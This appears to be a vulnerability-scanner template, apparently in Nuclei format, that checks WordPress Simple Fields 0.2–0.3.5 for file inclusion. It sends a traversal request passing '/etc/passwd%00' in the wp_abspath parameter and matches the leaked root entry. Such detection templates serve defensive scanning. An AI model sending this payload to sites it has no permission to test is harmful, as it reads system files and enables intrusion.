id: wp-simple-fields-lfi info: name: WordPress Simple Fields 0.2 - 0.3.5 LFI/RFI/RCE author: 0x240x23elu severity: high description: WordPress Simple Fields 0.2 is vulnerable to local file inclusion, remote file inclusion, and remote code execution. reference: - https://packetstormsecurity.com/files/147102/WordPress-Simple-Fields-0.3.5-File-Inclusion-Remote-Code-Execution.html tags: wordpress,wp-plugin,lfi requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" matchers: - type: regex regex: - "root:.*:0:0:" part: body # Enhanced by mp on 2022/07/29